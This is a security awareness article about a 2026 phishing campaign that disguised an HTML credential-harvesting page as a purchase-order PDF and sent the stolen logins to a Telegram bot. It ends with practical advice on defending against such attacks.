In early March 2026, cybersecurity analysts uncovered a deceptive phishing campaign that once again proves how cybercriminals exploit everyday business workflows to steal sensitive credentials. An email attachment that looked like a legitimate purchase order PDF was, in reality, a crafted credential harvesting page that silently collected victims’ login details and more.

The Illusion: A “PDF” You’re Safe to Open

The threat began with an email seemingly sent to a business professional — perhaps someone in accounts payable, sales, or operations — with a subject and text that mimicked a routine purchase request. The attachment was named:

New PO 500PCS.pdf.hTM

At first glance, it appeared to be a standard PDF purchase order — something recipients open hundreds of times as part of their daily routine.

But there’s a key tell-tale sign: the double extension .pdf.hTM. That’s a classic red flag. While most users assume a .pdf file is safe, the actual final extension (.HTM) means the file is an HTML document, not a PDF. HTML files open in a web browser and can run scripts or display phishing forms.

What Happens When the Attachment Is Opened

When the unsuspecting recipient opened the attachment, it didn’t launch Adobe Acrobat or another PDF reader. Instead:

1. A Browser Page Loaded

Instead of showing a document, a phishing web page was displayed in the browser. This page simulated a login prompt — making it appear as though the victim needed to re-enter their password to view the “PDF.”

2. Credentials and More Were Harvested

If the victim entered their password, several pieces of information were collected and sent to the attacker:

• The targeted email address (often pre-filled).
• The entered password.
• Technical details like IP address, geolocation, browser type, and operating system.

This data isn’t just useful on its own; cybercriminals can use a valid login to trick employees, access business systems, or sell credentials on illicit markets.

3. A “Verification Failed” Trick

After entering the wrong password once, the phishing page displayed a fake error (“Your account or password is incorrect. Try again.”). This is a psychological tactic used to encourage users to try entering their real password the second time — a common behavior that attackers exploit.

4. Nothing Suspicious Happens… Or So It Seems

After the data was sent, the page redirected the victim to an unrelated image that looked like a blurry invoice. This gave victims a reason to think they simply saw an unreadable purchase order, delaying any suspicion that credentials were stolen.

Why This Attack Works

This phishing campaign succeeds because it blends into typical work email traffic: Purchase orders are normal, attachments are expected, and people are conditioned to open documents without thinking twice. By disguising the malicious HTML file as a PDF and hiding behind the familiar workflow of quoting a purchase, the attackers increase their chances of collecting real credentials.

Moreover, rather than emailing the collected data (which could be blocked by security filters), the phishing page sent credentials silently via a Telegram bot — a popular, encrypted messaging platform that attackers often use as a command-and-control channel because it is harder for defenders to block.

What Happens After Credentials Are Stolen?

Once attackers have your email + password combination, along with location and system details, several bad outcomes are possible:

• Account takeover — If those credentials belong to your business systems (email, CRM, vendor portal), attackers can log in as you.
• Lateral attacks — Once inside, criminals can target other accounts or systems.
• Resale on dark markets — Many stolen credentials are sold to other threat actors.
• Credential reuse exploitation — Even if the account wasn’t critical, reused passwords can compromise other accounts.

How to Protect Yourself

Here are practical defenses against this and similar threats:

1. Check File Extensions Carefully

Don’t trust file names based on how they look. A double extension like .pdf.htm is suspicious — that’s not how genuine PDF documents are delivered.

2. Never Enter Credentials Based on an Attachment Prompt

Your browser should never ask for your password to open a PDF or document — legitimate files open without requiring credentials.

3. Use Multi-Factor Authentication (MFA)

MFA adds an additional layer of verification, meaning that even stolen passwords alone are often insufficient to gain access.

4. Use Real-Time Security Tools

Anti-malware with web protection can flag suspicious attachments and phishing content before you interact with them.

5. Educate Your Team

Most phishing attacks begin with human error. Training your team to recognize phishing indicators — like mismatched extensions, requests for credentials, and strange redirections — is one of the strongest defenses.

Final Thoughts: Awareness Is Your Best Defense

The growing sophistication of phishing techniques means your instincts and attention to detail are invaluable. Attackers count on familiarity and complacency — if you pause before opening attachments and think about the context of the request, you’re already much safer.

This campaign — disguised as an everyday business document — highlights how social engineering remains one of the most effective tools for cybercriminals. By learning to spot subtle red flags and applying basic security practices, you can dramatically reduce your risk of falling victim to similar scams.